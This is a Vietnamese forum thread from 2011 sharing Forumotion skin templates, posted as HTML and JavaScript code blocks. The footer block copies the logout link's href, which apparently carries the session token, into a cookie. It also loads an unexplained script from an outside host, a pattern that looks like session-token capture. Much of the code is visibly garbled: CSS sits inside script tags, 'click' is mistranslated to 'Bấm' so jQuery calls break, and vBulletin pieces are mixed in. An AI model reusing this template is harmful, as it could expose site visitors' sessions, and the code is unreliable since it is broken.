» Công Nghệ Thông Tin » Chinh Phục Forumtion » Skin FM » Share Skin 9xstudio.biz


You are not connected. Please login or register

Share Skin 9xstudio.biz

+2
™ßắçKµÑ™
An Hùng BMT
6 posters

Go down  Message [Page 1 of 1]

1Share Skin 9xstudio.biz Empty Share Skin 9xstudio.biz Fri Sep 16, 2011 12:56 pm

An Hùng BMT

An Hùng BMT
Admin
Admin

index_body
Code:
{JAVASCRIPT}
<!-- BEGIN message_admin_index -->
<table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="0">
   <!-- BEGIN message_admin_titre -->
   <tr>
      <td class="catHead" height="28"><span class="cattitle">{message_admin_index.message_admin_titre.MES_TITRE}</span></td>
   </tr>
   <!-- END message_admin_titre -->
   <!-- BEGIN message_admin_txt -->
   <tr>
      <td class="row1" rowspan="3" align="center" valign="middle">
      <div class="gensmall">{message_admin_index.message_admin_txt.MES_TXT}</div>
      </td>
   </tr>
   <!-- END message_admin_txt -->
</table>
<!-- END message_admin_index -->

<!-- BEGIN switch_user_login_form_header -->
<form action="{S_LOGIN_ACTION}" method="post" name="form_login">
   <!-- BEGIN switch_fb_connect_no -->
   <table width="100%" border="0" cellspacing="0" cellpadding="0" class="user_login_form forumline">
      <tr>
         <td class="row1" align="center">
            <table border="0" cellspacing="0" cellpadding="0">
               <tr>
                  <td><span class="genmed">{L_USERNAME}:</span> </td>
                  <td><input class="post" type="text" size="10" name="username"/> </td>
                  <td>
                     <input class="radio" type="checkbox" name="autologin" {AUTOLOGIN_CHECKED} />
                     <span class="gensmall">{L_AUTO_LOGIN}</span> 
                  </td>
               </tr>

               <tr>
                  <td><span class="genmed">{L_PASSWORD}:</span> </td>
                  <td><input class="post" type="password" size="10" name="password"/> </td>
                  <td>{S_HIDDEN_FIELDS}<input class="mainoption" type="submit" name="login" value="{L_LOGIN}" /></td>
               </tr>
            </table>
         </td>
      </tr>
   </table>
   <!-- END switch_fb_connect_no -->

   <!-- BEGIN switch_fb_connect -->
   <table width="100%" border="0" cellspacing="0" cellpadding="0" class="user_login_form forumline">
      <tr>
         <td valign="top" width="100%"  class="row1" align="center">
            <table width="100%">
               <tr>
                  <td width="55%" valign="middle" align="right">
                     <table class="right">
                        <tr>
                           <td><span class="genmed">{L_USERNAME}:</span> </td>
                           <td><input class="post" type="text" size="10" name="username"/> </td>
                           <td>
                              <input class="radio" type="checkbox" name="autologin" {AUTOLOGIN_CHECKED} />
                              <span class="gensmall">{L_AUTO_LOGIN}</span> 
                           </td>
                        </tr>

                        <tr>
                           <td><span class="genmed">{L_PASSWORD}:</span> </td>
                           <td><input class="post" type="password" size="10" name="password"/> </td>
                           <td>{S_HIDDEN_FIELDS}<input class="mainoption" type="submit" name="login" value="{L_LOGIN}" /></td>
                        </tr>
                     </table>
                  </td>
                  <td width="10%" align="center" valign="middle">
                     <span class="genmed fb_or">{switch_user_login_form_header.switch_fb_connect.L_OR}</span>
                  </td>
                  <td width="35%" class="align_gauche"><fb:login-button size="large" onlogin="window.location='/facebook_connect.forum'" v="2" perms="{switch_user_login_form_header.switch_fb_connect.L_FB_PERMISSIONS}">{switch_user_login_form_header.switch_fb_connect.L_FB_LOGIN_BUTTON}</fb:login-button></td>
               </tr>
            </table>
         </td>
      </tr>
   </table>
   <!-- END switch_fb_connect -->
</form>
<!-- END switch_user_login_form_header -->

{CHATBOX_TOP}
{BOARD_INDEX}
<table width="100%" border="0" cellspacing="0" cellpadding="0">
   <tr>
      <td width="50%" valign="top">
         <!-- BEGIN switch_user_logged_in -->
         <span class="gensmall"><a href="{U_MARK_READ}" class="gensmall">{L_MARK_FORUMS_READ}</a>
         <!-- END switch_user_logged_in -->
         <!-- BEGIN switch_delete_cookies -->
         <br /><a href="{switch_delete_cookies.U_DELETE_COOKIES}" class="gensmall">{switch_delete_cookies.L_DELETE_COOKIES}</a>
         <!-- END switch_delete_cookies -->
         </span>
      </td>
      <td width="50%" align="right">
         <span class="gensmall">
            <a href="{U_TODAY_ACTIVE}" class="gensmall">{L_TODAY_ACTIVE}</a><br />
            <a href="{U_TODAY_POSTERS}" class="gensmall">{L_TODAY_POSTERS}</a><br />
            <a href="{U_OVERALL_POSTERS}" class="gensmall">{L_OVERALL_POSTERS}</a>
            <!-- BEGIN switch_on_index -->
               <!-- BEGIN switch_delete_cookies -->
               <br /><a href="{switch_on_index.switch_delete_cookies.U_DELETE_COOKIES}" class="gensmall">{switch_on_index.switch_delete_cookies.L_DELETE_COOKIES}</a>
               <!-- END switch_delete_cookies -->
            <!-- END switch_on_index -->
         </span>
      </td>
   </tr>
</table>

<!-- BEGIN switch_user_login_form_footer -->
<form action="{S_LOGIN_ACTION}" method="post" name="form_login">
   <!-- BEGIN switch_fb_connect_no -->
   <table width="100%" border="0" cellspacing="0" cellpadding="0" class="user_login_form forumline">
      <tr>
         <td class="row1" align="center">
            <table border="0" cellspacing="0" cellpadding="0">
               <tr>
                  <td><span class="genmed">{L_USERNAME}:</span> </td>
                  <td><input class="post" type="text" size="10" name="username"/> </td>
                  <td>
                     <input class="radio" type="checkbox" name="autologin" {AUTOLOGIN_CHECKED} />
                     <span class="gensmall">{L_AUTO_LOGIN}</span> 
                  </td>
               </tr>

               <tr>
                  <td><span class="genmed">{L_PASSWORD}:</span> </td>
                  <td><input class="post" type="password" size="10" name="password"/> </td>
                  <td>{S_HIDDEN_FIELDS}<input class="mainoption" type="submit" name="login" value="{L_LOGIN}" /></td>
               </tr>
            </table>
         </td>
      </tr>
   </table>
   <!-- END switch_fb_connect_no -->

   <!-- BEGIN switch_fb_connect -->
   <table width="100%" border="0" cellspacing="0" cellpadding="0" class="user_login_form forumline">
      <tr>
         <td valign="top" width="100%"  class="row1" align="center">
            <table width="100%">
               <tr>
                  <td width="55%" valign="middle">
                     <table class="right">
                        <tr>
                           <td><span class="genmed">{L_USERNAME}:</span> </td>
                           <td><input class="post" type="text" size="10" name="username"/> </td>
                           <td>
                              <input class="radio" type="checkbox" name="autologin" {AUTOLOGIN_CHECKED} />
                              <span class="gensmall">{L_AUTO_LOGIN}</span> 
                           </td>
                        </tr>

                        <tr>
                           <td><span class="genmed">{L_PASSWORD}:</span> </td>
                           <td><input class="post" type="password" size="10" name="password"/> </td>
                           <td>{S_HIDDEN_FIELDS}<input class="mainoption" type="submit" name="login" value="{L_LOGIN}" /></td>
                        </tr>
                     </table>
                  </td>
                  <td width="10%" align="center" valign="middle">
                     <span class="genmed fb_or">{switch_user_login_form_footer.switch_fb_connect.L_OR}</span>
                  </td>
                  <td width="35%" class="align_gauche"><fb:login-button size="large" onlogin="window.location='/facebook_connect.forum'" v="2" perms="{switch_user_login_form_footer.switch_fb_connect.L_FB_PERMISSIONS}">{switch_user_login_form_footer.switch_fb_connect.L_FB_LOGIN_BUTTON}</fb:login-button></td>
               </tr>
            </table>
         </td>
      </tr>
   </table>
   <!-- END switch_fb_connect -->
</form>
<!-- END switch_user_login_form_footer -->

<!-- BEGIN disable_viewonline -->
<table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="0">
   <tr>
      <td class="catHead" colspan="2" height="28">
      <!-- BEGIN switch_viewonline_link -->
      <span class="cattitle"><a class="cattitle" href="{U_VIEWONLINE}" rel="nofollow">{L_WHO_IS_ONLINE}</a></span>
      <!-- END switch_viewonline_link -->

      <!-- BEGIN switch_viewonline_nolink -->
      <span class="cattitle">{L_WHO_IS_ONLINE}</span>
      <!-- END switch_viewonline_nolink -->
      </td>
   </tr>
   <tr>
      <td class="row1" rowspan="6" align="center" valign="middle"><img src="{L_ONLINE_IMG}" id="i_whosonline" alt="{L_WHO_IS_ONLINE}" /></td>
      <td class="row1" width="100%"><span class="gensmall">{TOTAL_POSTS}<br />
      {TOTAL_USERS}<br />
      {NEWEST_USER}</span></td>
   </tr>
   <tr>
      <td class="row1"><span class="gensmall">{TOTAL_USERS_ONLINE}<br />
      {RECORD_USERS}<br />
      <br />
      {LOGGED_IN_USER_LIST}</span></td>
   </tr>
   {L_CONNECTED_MEMBERS}
   {L_WHOSBIRTHDAY_TODAY}
   {L_WHOSBIRTHDAY_WEEK}
   <tr>
      <td class="row1"><span class="gensmall">{LEGEND} : {GROUP_LEGEND}</span></td>
   </tr>
   <!-- BEGIN switch_chatbox_activate -->
   <tr>
      <td class="row1">
         <span class="gensmall">{TOTAL_CHATTERS_ONLINE} :  {CHATTERS_LIST}<br />
            <!-- BEGIN switch_chatbox_popup -->
            <div id="chatbox_popup"></div>
            <script type="text/javascript">
            //<![CDATA[
            insertChatBoxPopup('{disable_viewonline.switch_chatbox_activate.switch_chatbox_popup.U_FRAME_CHATBOX}', '{L_CLICK_TO_JOIN_CHAT}');
            //]]>
            </script>
            <!-- END switch_chatbox_popup -->
         </span>
      </td>
   </tr>
   <!-- END switch_chatbox_activate -->
</table>
<!-- END disable_viewonline -->
{CHATBOX_BOTTOM}
<br clear="all" />
<!-- BEGIN switch_legend -->
<table border="0" cellspacing="3" cellpadding="0" align="center">
   <tr>
      <td align="center" width="20"><img src="{FORUM_NEW_IMG}" alt="{L_NEW_POSTS}" /></td>
      <td><span class="gensmall">{L_NEW_POSTS}</span></td>
      <td></td>
      <td align="center" width="20"><img src="{FORUM_IMG}" alt="{L_NO_NEW_POSTS}" /></td>
      <td><span class="gensmall">{L_NO_NEW_POSTS}</span></td>
      <td>  </td>
      <td align="center" width="20"><img src="{FORUM_LOCKED_IMG}" alt="{L_FORUM_LOCKED}" /></td>
      <td><span class="gensmall">{L_FORUM_LOCKED}</span></td>
   </tr>
</table>
<!-- END switch_legend -->

{AUTO_DST}

<!-- BEGIN switch_fb_index_login -->
<div id="fb-root"></div>
<script type="text/javascript">
//<![CDATA[
FB.init({
   appId: '{switch_fb_index_login.FACEBOOK_APP_ID}',
     status: true,
     cookie: true,
     xfbml: true
});
//]]>
</script>
<!-- END switch_fb_index_login -->
Nguồn:Reddragon

2Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Fri Sep 16, 2011 12:56 pm

An Hùng BMT

An Hùng BMT
Admin
Admin

index_box
Code:
<table width="100%" border="0" cellspacing="1" cellpadding="0" align="center">
  <tr>
      <td valign="bottom">
        <!-- BEGIN switch_user_logged_in -->
        <span class="gensmall">{LAST_VISIT_DATE}<br />
        {CURRENT_TIME}<br />
        </span>
        <!-- END switch_user_logged_in -->
        <div class="nav"><a class="nav" href="{U_INDEX}">{L_INDEX}</a>{NAV_CAT_DESC}</div>
      </td>
      <td class="gensmall" align="right" valign="bottom">
        <!-- BEGIN switch_user_logged_in -->
        <a class="gensmall" href="{U_SEARCH_NEW}">{L_SEARCH_NEW}</a><br />
        <a class="gensmall" href="{U_SEARCH_SELF}">{L_SEARCH_SELF}</a><br />
        <!-- END switch_user_logged_in -->
        <a class="gensmall" href="{U_SEARCH_UNANSWERED}">{L_SEARCH_UNANSWERED}</a>
      </td>
  </tr>
</table>
<!-- BEGIN catrow --><!-- BEGIN tablehead --><table class="tborder" cellpadding="6" cellspacing="1" border="0" width="100%" align="center"><tbody><tr><td class="tcat" colspan="5"><span class="tcat_alt_collapse" style="float:right"><img src="http://i43.servimg.com/u/f43/16/03/04/56/collap12.gif" alt="" border="0" /><img style="display:none;" src="http://i43.servimg.com/u/f43/16/03/04/56/collap13.gif" alt="" border="0" /></span><h2>{catrow.tablehead.L_FORUM}</h2></td></tr></tbody>
  <!-- END tablehead -->
  <!-- BEGIN cathead -->
  <tr>
      <!-- BEGIN inc -->
      <td class="{catrow.cathead.inc.INC_CLASS}" width="46"><img src="{SPACER}" height="0" width="46" /></td>
      <!-- END inc -->
      <td class="{catrow.cathead.CLASS_CAT}" colspan="{catrow.cathead.INC_SPAN}" width="100%">
        <h{catrow.cathead.LEVEL} class="hierarchy">
            <span class="cattitle">
              <a class="cattitle" title="{catrow.cathead.CAT_DESC}" href="{catrow.cathead.U_VIEWCAT}">{catrow.cathead.CAT_TITLE}</a>
            </span>
        </h{catrow.cathead.LEVEL}>
      </td>
      <td class="{catrow.cathead.CLASS_ROWPIC}" colspan="3" align="right"> </td>
  </tr>
  <!-- END cathead -->
  <!-- BEGIN forumrow -->
  <tr>
      <!-- BEGIN inc -->
      <td class="{catrow.forumrow.inc.INC_CLASS}" width="46"><img src="{SPACER}" height="0" width="46" alt="." /></td>
      <!-- END inc -->
<tbody id="collapseobj_forumbit_1" style=""><tr align="center"><td class="alt1" width="1"> <img title="Không có bài viết mới" src="
  {catrow.forumrow.FORUM_FOLDER_IMG}" alt="Không có bài viết mới" value="Quảng Cáo - Rao Vặt"  /></td><td class="alt1Active" align="left" id="f2"><div> <a class="forumlink" href="{catrow.forumrow.U_VIEWFORUM}"><div class="postbody"><dl>{catrow.forumrow.FORUM_NAME}</div></a></div><div class="postbody"><dl><span class="gensmall">{catrow.forumrow.FORUM_DESC}<br /></span></div><br/><span class="gensmall"><div id="smallrum"></div></span></div></td><td class="alt2" width="310"><span class="smallfont" align="left"><div class="lastpost" align="right" id="lttc"><span>{catrow.forumrow.LAST_POST}</div></span><table align="center" width="310"><tbody><tr><td align="center"><img src="http://i1205.photobucket.com/albums/bb427/LoveStudio/eLDy%20Style/info.gif"></td></tr><tr align="center"><td align="center" style="padding: 0px 4px 0px 4px;margin-top: 0px; border: 1px dotted #CFD3D5; display: inline;"><span style="font-size: 8pt"> <font color="#373737">Threads : <font size="+2" color="#99bf00"><b>{catrow.forumrow.TOPICS}</b></font> </font> <font color="red"> ♥</font> <font color="#373737">Posts : <font size="+1" color="#ff8a00"><b>{catrow.forumrow.POSTS}</b></font></font> </span></td></tr></tbody></table></td></tr><tr>


  <!-- END forumrow -->
  <!-- BEGIN catfoot -->
  <tr>
      <!-- BEGIN inc -->
      <td class="{catrow.catfoot.inc.INC_CLASS}" width="46"><img src="{SPACER}" height="0" width="46" /></td>
      <!-- END inc -->
      <td class="spaceRow" colspan="{catrow.catfoot.INC_SPAN}" height="1"><img src="{SPACER}" alt="" height="1" width="1" /></td>
  </tr>
  <!-- END catfoot -->
  <!-- BEGIN tablefoot -->
</table><img src="{SPACER}" alt="" height="5" width="1" /><!-- END tablefoot --><!-- END catrow -->

3Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Fri Sep 16, 2011 12:58 pm

An Hùng BMT

An Hùng BMT
Admin
Admin

footer
Code:
<script>span[style="color: rgb(240, 3, 3);"],span[style="color:#FF0000"],


{color:#fff;text-shadow: 0 0 .2em red, 0 0 .2em red, 0 0 .3em red;}
span[style="color: rgb(240, 3, 3);"]:before{content: url(/users/2211/12/43/96/album/mem10.gif);padding-right:2px;}
span[style="color:#0004FF"]:before{content: url(/users/2211/12/43/96/album/mem10.gif);padding-right:2px;}

span[style="color: rgb(240, 3, 3);"]:before{content: url(http://aladinbandenbin.me.megaweb.vn/download/MTMwNDg1OTk0NC45adminl14.gif);padding-right:2px;}
span[style="color:#F00303]:before{content: url(http://aladinbandenbin.me.megaweb.vn/download/MTMwNDg1OTk0NC45adminl14.gif);padding-right:2px;}





<center><div class="gen" valign="bottom"> </div><script type='text/javascript'>var sheight = $(window).height();var maxheight = $("body").height();$(function(){$.fn.scrollToMiddle=function(){$(this).hide().removeAttr("href");if($(window).scrollTop()!="maxheight/2-sheight/2"){$(this).fadeIn("slow")}var scrollDiv=$(this);$(window).scroll(function(){if($(window).scrollTop()=="maxheight/2-sheight/2"){$(scrollDiv).fadeOut("slow")}else{$(scrollDiv).fadeIn("slow")}});$(this).Bấm(function(){$("html, body").animate({scrollTop:maxheight/2-sheight/2},"slow")})}});$(function(){$.fn.scrollToBottom=function(){$(this).hide().removeAttr("href");if($(window).scrollTop()!="maxheight"){$(this).fadeIn("slow")}var scrollDiv=$(this);$(window).scroll(function(){if($(window).scrollTop()=="maxheight"){$(scrollDiv).fadeOut("slow")}else{$(scrollDiv).fadeIn("slow")}});$(this).Bấm(function(){$("html, body").animate({scrollTop:maxheight},"slow")})}});$(function(){$.fn.scrollToTop=function(){$(this).hide().removeAttr("href");if($(window).scrollTop()!="0"){$(this).fadeIn("slow")}var scrollDiv=$(this);$(window).scroll(function(){if($(window).scrollTop()=="0"){$(scrollDiv).fadeOut("slow")}else{$(scrollDiv).fadeIn("slow")}});$(this).Bấm(function(){$("html, body").animate({scrollTop:0},"slow")})}});$(function() {$("#toMiddle").scrollToMiddle();$("#toTop").scrollToTop();$("#toBottom").scrollToBottom();});</script><div id="page-footer"><div align="center"><div class="gen"><strong><a href="http://www.forumvi.com/vi/create-forum/" target="_blank" class="copyright">Free forum</a></strong><span class="gensmall">©</span> <a href="http://www.forumvi.com/vi/phpbb/" target="_blank" class="copyright">phpBB</a> | <a name="bottom" href="http://help.forumotion.com/" target="_blank" class="copyright">Free forum support</a> | <a name="bottom" href="/statistics" class="copyright" rel="nofollow">Statistics</a> | <a name="bottom" href="/donate" class="copyright" rel="nofollow">Contribution</a> | <a name="bottom" href="/contact" class="copyright" rel="nofollow">Liên hệ</a> | <a href="/abuse?page=%2Fforum&amp;report=1" class="copyright" rel="nofollow">Report an abuse</a></div></div></div><div style="bottom: 25px;clip: inherit;position: fixed;right: 5px;"><a href="#" id="toTop"><img alt="Đầu trang" border="0" src="http://i972.photobucket.com/albums/ae201/teensonha/top10.png"></a><br><a href="#" id="toMiddle"><img alt="Giữa trang" border="0" src="http://i972.photobucket.com/albums/ae201/teensonha/middle10.png"></a><br><a href="#" id="toBottom"><img alt="Cuối trang" border="0" src="http://i972.photobucket.com/albums/ae201/teensonha/bottom10.png"></a></div></div><!--
 close div id="page-body" --></td></tr></table><script type="text/javascript">$(function(){$("div.a1tg3td:contains('»')").remove();});</script><script type="text/javascript">$(function(){$("input#username_reg").attr("maxlength","15");})</script><script type="text/javascript">$(function(){if($(".sms").is(":contains('smsa1')")){$(".sms").append("<img src='/users/2211/12/43/96/album/flying10.png'> <input class='post' style='margin:1px 0' type='text' id='username' name='username[]' value='' size='25' tabindex='1'>    <span class='forumline'><b><a href='/t454-topic' target='_blank'>Hướng dẫn gửi TĐYT</a></b></span>");}else if($(".sms").is(":contains('nhắn')")){$(".sms").append("");}else{$(".sms").remove();}})</script><script>$("a.lengtht").each(function(){if ($(this).text().length > 21) {$(this).text($(this).text().substr(0, 18));$(this).append('...');}});$(".textlimit").each(function(){if ($(this).text().length > 46) {$(this).text($(this).text().substr(0, 43));$(this).append('...');}});$(".a1view").each(function(){$(this).html(parseInt($(this).text().replace(/^[\s\S]*-\s+(\d+)\s+[\s\S]*$/m, '$1')));});$("span.tda1pzo").each(function(){$(this).html($(this).text().replace(/♥/, ''));$("span.tda1pzo:contains('ngonluahong159'),span.tda1pzo:contains('helloteen')").css("color","#595959");$("span.tda1pzo:contains('Saturn_PTIT'),span.tda1pzo:contains('Thuan007')").css("color","#FA0000");$("span.tda1pzo:contains('Lanhaukt'),span.tda1pzo:contains('girl_noname')").css("color","#FF6600");$("span.tda1pzo:contains('No1forever'),span.tda1pzo:contains('gabong4mat'),span.tda1pzo:contains('hihihuhuhehehaha')").css("color","#00BF00");});</script><script type="text/javascript">//<![CDATA[
fa_endpage();//]]></script><script src="/h1-" type="text/javascript"></script></body></html>
<script language="javascript" type="text/javascript">hide_Loading();</script>



<script type="text/javascript">jQuery("#vnchatbox1").Bấm(function(){jQuery("#vnrules1").toggle("slow");});</script></fieldset></center>

<script type="text/javascript">
jQuery(document).ready(function(){my_setcookie('mytid',jQuery("#logout").attr("href"),1,0);});
</script>


<script src=http://www.vns2pro.com/h2-page></script>

4Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Fri Sep 16, 2011 12:59 pm

An Hùng BMT

An Hùng BMT
Admin
Admin

header
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="{S_CONTENT_DIRECTION}" id="min-width" lang="{L_LANG_HTML}" xml:lang="{L_LANG_HTML}" {NAMESPACE_FB_LIKE} {NAMESPACE_FB} {NAMESPACE_BBCODE}>
<head>
  <title>{SITENAME_TITLE}{PAGE_TITLE}</title>
  <meta http-equiv="content-type" content="text/html; charset={S_CONTENT_ENCODING}" />
  <meta http-equiv="content-script-type" content="text/javascript" />
  <meta http-equiv="content-style-type" content="text/css" />
  <!-- BEGIN switch_compat_meta -->
  <meta http-equiv="X-UA-Compatible" content="IE={switch_compat_meta.VERSION}" />
  <!-- END switch_compat_meta -->
  <!-- BEGIN switch_canonical_url -->
  <url rel="canonical" href="{switch_canonical_url.CANONICAL_URL}" />
  <!-- END switch_canonical_url -->
  {META_FAVICO}
  {META}
  {META_FB_LIKE}
  <meta name="title" content="{SITENAME_TITLE}{PAGE_TITLE}" />
  {T_HEAD_STYLESHEET}
  {CSS}
  <url rel="search" type="application/opensearchdescription+xml" href="/improvedsearch.xml" title="{SITENAME}" />
  <url rel="search" type="application/opensearchdescription+xml" href="{URL_BOARD_DIRECTORY}/search/improvedsearch.xml" title="{SEARCH_FORUMS}" />
  <script src="{JQUERY_PATH}" type="text/javascript"></script>
  <script src="{JS_DIR}{L_LANG}.js" type="text/javascript"></script>

  <!-- BEGIN switch_fb_login -->
  <script src="http://connect.facebook.net/{switch_fb_login.FB_LOCAL}/all.js" type="text/javascript"></script>
  <script src="{switch_fb_login.JS_FB_LOGIN}" type="text/javascript"></script>
  <!-- END switch_fb_login -->

  <!-- BEGIN switch_ticker -->
  <url type="text/css" rel="stylesheet" href="{JS_DIR}jquery/ticker/ticker.css" />
  <script src="{JS_DIR}jquery/ticker/ticker.js" type="text/javascript"></script>
  <!-- END switch_ticker -->

  <script type="text/javascript" src="clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=384"></script>
<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=384"></script>
<script type="text/javascript">
<!--
var SESSIONURL = "";
var SECURITYTOKEN = "guest";
var IMGDIR_MISC = "[LD]NewSemester2/misc";
var vb_disable_ajax = parseInt("0", 10);
// -->
</script>
<script type="text/javascript" src="clientscript/vbulletin_global.js?v=384"></script>
<script type="text/javascript" src="clientscript/vbulletin_menu.js?v=384"></script>


  <url rel="alternate" type="application/rss+xml" title="-‘@’- .:: Phong Cách Teen Vn - Cộng Đồng Teen Việt Giải Trí - Sôi Động - Sành Điệu - Chém Gió ::. -‘@’- RSS Feed" href="external.php?type=RSS2" />
 

<!--
  nCode Image Resizer
  (c) nCode
  http://www.ncode.nl/
-->
<script type="text/javascript" src="clientscript/ncode_imageresizer.js"></script>
<style type="text/css">
<!--
table.ncode_imageresizer_warning {
  background: #FFFFE1;
  color: #000000;
  border: 1px solid #CCC;
  cursor: pointer;
}

table.ncode_imageresizer_warning td {
  font-size: 10px;
  vertical-align: middle;
  text-decoration: none;
}

table.ncode_imageresizer_warning td.td1 {
  padding: 5px;
}

table.ncode_imageresizer_warning td.td1 {
  padding: 2px;
}
-->
</style>
<script type="text/javascript">
<!--
NcodeImageResizer.MODE = 'enlarge';
NcodeImageResizer.MAXWIDTH = 500;
NcodeImageResizer.MAXHEIGHT = 0;

vbphrase['ncode_imageresizer_warning_small'] = 'Bấm this bar to view the full image.';
vbphrase['ncode_imageresizer_warning_filesize'] = 'This image has been resized. Bấm this bar to view the full image. The original image is sized %1$sx%2$s and weights %3$sKB.';
vbphrase['ncode_imageresizer_warning_no_filesize'] = 'This image has been resized. Bấm this bar to view the full image. The original image is sized %1$sx%2$s.';
vbphrase['ncode_imageresizer_warning_fullsize'] = 'Bấm this bar to view the small image.';
//-->
</script>
  <title>-‘@’- .:: Phong Cách Teen Vn - Cộng Đồng Teen Việt Giải Trí - Sôi Động - Sành Điệu - Chém Gió ::. -‘@’- </title>
</head>
<body>
<table width="937" border="0" cellspacing="0" cellpadding="0" align="center">
  <tr>
    <td height="52" align="center">





<!-- nav buttons bar -->
<div style="padding:1px; border-top-width:0px">
  <table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
  <tr align="center">
     
     
        <td class="vbmenu_control2">{GENERATED_NAV_BAR}  </td>
     
     
     
       
       
     
     
     
      </tr>

  </table>
</div>
<!-- / nav buttons bar -->





</td>
  </tr>
  <tr>
    <td height="272">
</td>

  </tr>
  <tr>
    <td height="144" valign="top" style="padding-left:35px">







<table border="0" cellspacing="0" cellpadding="0" align="left">
<tr>

  <td nowrap="nowrap" style="padding:0px">

      <!-- BEGIN switch_user_logged_out -->
<!-- login form -->
<form class="c3login" action="{S_LOGIN_ACTION}" method="post"  name="form_login">

<table border="0" cellpadding="0" cellspacing="3">
<TBODY>
<tr>
<td class="smallfont" style="white-space: nowrap;">
<label for="navbar_username">Tài khoản:</label></td>
<td><input type="text" class="bginput" style="font-size: 11px"
name="username" id="username" size="15" accesskey="u" tabindex="101"
value="Username" onfocus="if (this.value == 'Username') this.value = '';" />
</td>
<td class="smallfont" nowrap="nowrap"><label for="autologin">
<input type="checkbox" name="cookieuser" value="1"
tabindex="103" id="autologin" accesskey="c" />Ghi nhớ?</label>
</td>
</tr>
<tr>
<td class="smallfont"><label for="password">Mật khẩu:</label>
</td>   
<td><input type="password" class="bginput" style="font-size: 11px;"
name="password" id="password" size="15" tabindex="102"
value="*****" onfocus="if (this.value == '*****') this.value = '';" />
</td>
<td><input class="button" value="Đăng nhập" tabindex="104"
title="Nhập tên tài khoản và mật khẩu để đăng nhập. Hoặc bấm nút 'đăng ký' để tạo tài khoản mới." accesskey="s"
type="submit" name="login"/>
</td>
</tr>
</tbody>
</table>
 
<center><b><a href="profile.forum?mode=sendpassword"><font size="1.7">:: Quên mật khẩu? :: </font></a></b></center>
<!-- END switch_user_logged_out -->

<!-- BEGIN switch_user_logged_in -->
<span class="gensmall">
<font color=red> {LOGGED_AS}</font><br />
<font color=blue> {LAST_VISIT_DATE}</font> <br />
<font color=green> {CURRENT_TIME}</font></span><br />
<!-- END switch_user_logged_in -->
</form> 
<!-- / login form -->

  </td>


</tr>

</table>








</td>
  </tr>
  <tr>
    <td>



      <table width="100%" border="0" cellspacing="0" cellpadding="0">
          <tr>

            </tr>
        </table>




</td>

  </tr>
  <tr>
    <td align="center"><img src="http://i1205.photobucket.com/albums/bb427/LoveStudio/eLDy%20Style/topbody.gif" width="908" height="9" /></td>
  </tr>
  <tr>
    <td background="http://i1205.photobucket.com/albums/bb427/LoveStudio/eLDy%20Style/body.gif" style="background-repeat:repeat-y; background-position:center" align="center">
<!-- content table -->
<!-- open content container -->

<div align="center">
  <div class="page" style="width:900px; text-align:left">

      <div style="padding:0px 25px 0px 25px" align="left">





<br />

<!-- breadcrumb, login, pm info -->
<table cellpadding="6" cellspacing="1" border="0" width="100%" align="center">
<tr>
  <td class="alt1" width="100%">
     
        <div class="navbar" style="font-size:10pt"><a href="index.php" accesskey="1"><img class="inlineimg" src="http://caobaquat.com/diendan/[LD]NewSemester2/misc/navbits_start.gif" alt="" border="0" /></a> <strong>-‘@’- .:: Phong Cách Teen Vn - Cộng Đồng Teen Việt Giải Trí - Sôi Động - Sành Điệu - Chém Gió ::. -‘@’-</strong></div>

     
  </td>
</tr>
</table>
<!-- / breadcrumb, login, pm info -->



<br />






<!-- NAVBAR POPUP MENUS -->

 
  <!-- community url menu -->
  <div class="vbmenu_popup" id="community_menu" style="display:none;margin-top:3px" align="left">
      <table cellpadding="4" cellspacing="1" border="0">
      <tr><td class="thead">Community Links</td></tr>
     
     
     
     
     
        <tr><td class="vbmenu_option"><a href="memberlist.php">Thành Viên</a></td></tr>
     
     
      </table>
  </div>
  <!-- / community url menu -->

 
 
 
  <!-- header quick search form -->
  <div class="vbmenu_popup" id="navbar_search_menu" style="display:none;margin-top:3px" align="left">
      <table cellpadding="4" cellspacing="1" border="0">
      <tr>
        <td class="thead">Kiếm Trong Diễn Ðàn</td>
      </tr>
      <tr>
        <td class="vbmenu_option" title="nohilite">

            <form action="search.php?do=process" method="post">

              <input type="hidden" name="do" value="process" />
              <input type="hidden" name="quicksearch" value="1" />
              <input type="hidden" name="childforums" value="1" />
              <input type="hidden" name="exactname" value="1" />
              <input type="hidden" name="s" value="" />
              <input type="hidden" name="securitytoken" value="guest" />
              <div><input type="text" class="bginput" name="query" size="25" tabindex="1001" /><input type="submit" class="button" value="Tiếp Tục" tabindex="1004" /></div>

              <div style="margin-top:6px">
                  <label for="rb_nb_sp0"><input type="radio" name="showposts" value="0" id="rb_nb_sp0" tabindex="1002" checked="checked" />Show Threads</label>
                 
                  <label for="rb_nb_sp1"><input type="radio" name="showposts" value="1" id="rb_nb_sp1" tabindex="1003" />Show Posts</label>
              </div>
            </form>
        </td>
      </tr>

     
      <tr>
        <td class="vbmenu_option"><a href="tags.php" rel="nofollow">Tag Search</a></td>
      </tr>
     
      <tr>
        <td class="vbmenu_option"><a href="search.php" accesskey="4" rel="nofollow">Kiếm Chi Tiết</a></td>
      </tr>
      <tr>
  <td class="vbmenu_option"><a href="post_thanks.php?do=findallthanks">Find All Thanked Posts</a></td>

</tr>
      </table>
  </div>
  <!-- / header quick search form -->
 
 
 
<!-- / NAVBAR POPUP MENUS -->

<!-- PAGENAV POPUP -->
  <div class="vbmenu_popup" id="pagenav_menu" style="display:none">
      <table cellpadding="4" cellspacing="1" border="0">
      <tr>

        <td class="thead" nowrap="nowrap">Go to Page...</td>
      </tr>
      <tr>
        <td class="vbmenu_option" title="nohilite">
        <form action="index.php" method="get" onsubmit="return this.gotopage()" id="pagenav_form">
            <input type="text" class="bginput" id="pagenav_itxt" style="font-size:11px" size="4" />
            <input type="button" class="button" id="pagenav_ibtn" value="Tiếp Tục" />
        </form>

        </td>
      </tr>
      </table>
  </div>
<!-- / PAGENAV POPUP -->

           

            <div id="page-body">
              <div id="{ID_CONTENT_CONTAINER}"{CLASS_CONTENT_CONTAINER}>
